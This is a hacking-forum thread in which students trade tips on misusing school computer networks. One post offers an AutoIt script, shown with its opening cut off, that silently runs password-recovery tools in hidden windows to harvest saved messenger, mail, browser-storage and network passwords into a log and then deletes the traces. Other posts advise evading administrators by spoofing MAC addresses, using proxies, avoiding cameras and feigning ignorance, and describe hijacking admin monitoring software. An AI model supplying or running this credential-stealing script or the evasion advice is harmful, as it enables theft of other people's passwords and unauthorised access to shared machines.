Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

The bewares of hacking

0 0

Well, I kind thought of this topic up, when I used an '*' in the (Command removed) command at my school…

1. Beware of the *!!! Its fun, but dangorus
  2. Beware of logs, use a proxy…

0 0
  1. Everyone knows this, not to be putting you down or anything, but read in most of the articles, and you'll see that this is mentioned several times.
  2. There are extremely easy ways of hiding yourself, none of which I think many people should know because they will just go to their school, do it, and then act like 'god' because you can make a window pop up on someones computer. You are not god. -Thank you Psycha

0 0

Many machines are shipped with the service disabled, meaning even stupid admin's won't have many machines with net send on.

you also need to know work group names for this command to be useful. I recomment printers.faxes-add printer-network-scan for printers

Spoof your MAC, avoid security cameras. Play dumb - if the admins dont know that you know anything about computers, they won't pursue you. It'd funny to see the skiddies at your school who talk to much and brag about using etherape get fucked. Take a tech class, and get an A, but play dumb. then do something really serious, and watch the idiots take a fall because the admin idiots don't know anything :)

0 0

if you guys have a program that your admins can watch your monitor from theirs than theres a way around. i wont describe how but all you have to do is find the pgrm on the network download it to your portable usb and then run the pgrm yourself which in turn will disrupt the admins pgrm and will redirect them to a different computer of your choice. :)

pretty niffty.

also i ahve this little thing here for anyone who wants it. this is my only code that ill give out ever(cuz its hard to use)

FIRST: download MessenPAss Mail PassView Protected Storage PassView Network Password Recovery

SECOND: compile a script into an EXE. Heres the script

..\Password\New\PSPV.txt" ', @ScriptDir, @ SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\Password\Software\IM.exe /stext
..\Password\New\IM.txt" ', @ScriptDir, @ SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\Password\Software\Mail.exe /stext
..\Password\New\Mail.txt" ', @ScriptDir, @ SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\Password\Software\Network.exe /stext
..\Password\New\Network.txt" ', @ScriptDir, @ SW_HIDE)
sleep(1000)

Run(@ComSpec & ' /k "COPY ..\Password\New\*.txt ..\Password\New\all.txt" ', @ScriptDir, @ SW_HIDE)
sleep(1000)

Dim $DateTime, $Location, $FileName
$DateTime = @YEAR & "-" & @MON & "-" & @MDAY & " " & @HOUR & "-" & @MIN & "-" & @SEC
$Location = @WorkingDir & '\new\'
$FileName = "all.txt"
FileMove($Location & $FileName , $Location & $DateTime & ".log",1)
sleep(2000)

Run(@ComSpec & ' /k "del ..\Password\New\*.txt" ', @ScriptDir, @ SW_HIDE)
sleep(1000)```

THIRD: run it for fun and get passwds without these pgrms ever showing up on your screen :)

0 0

Raster wrote: I used an '*' in the (Command removed) command at my school…

Well I sure understand what command you used… So what? Sending a popup box was cool 5 years ago and it is a windows function, not a 1337h4x-4pp1i(47i0n :p

But still I remember how much fun I had in 7th grade, when I wrote a batch bomber for that command. All I can say is that nowadays I laugh at all the things I did back then :D

0 0

Uber0n wrote: [quote]Raster wrote: I used an '*' in the (Command removed) command at my school…

Well I sure understand what command you used… So what? Sending a popup box was cool 5 years ago and it is a windows function, not a 1337h4x-4pp1i(47i0n :p

But still I remember how much fun I had in 7th grade, when I wrote a batch bomber for that command. All I can say is that nowadays I laugh at all the things I did back then :D[/quote]

Rofl, also remembers having fun with this in 7th grade Me and some friends just used it as a chat because we couldn't get any of the other chat servers to work, besides 1 on some band site, but i took forever to work… *ahhhhh, back in the day, back in the day

0 0

Yes, it is a windows function, but when I use xcopy to move my programming projects from the school-allocated user space to my flash drive, everyone around me starts getting really scared because I'm "hackingthe school", and blame me every time the servers are down. So it may not be 1337 ownage, but it'll freak out noobs just like anything else.

0 0

god i hate it when that happens. i net used a couple of computers on our network(big woow :|) and find a file showing last year's merit(award scheme thing) log, and all of a sudden 6 people crowd round me cos im "hacking the system"… :|

0 0

lol people think its insane when i use cmd instead of browsing in windows(not the OS but the windows themselves), they are like "geez you are insane!"…. and all i do is it to open files and what not with it because our comp's are slow so i hate opening up My Computer and what not, takes too long.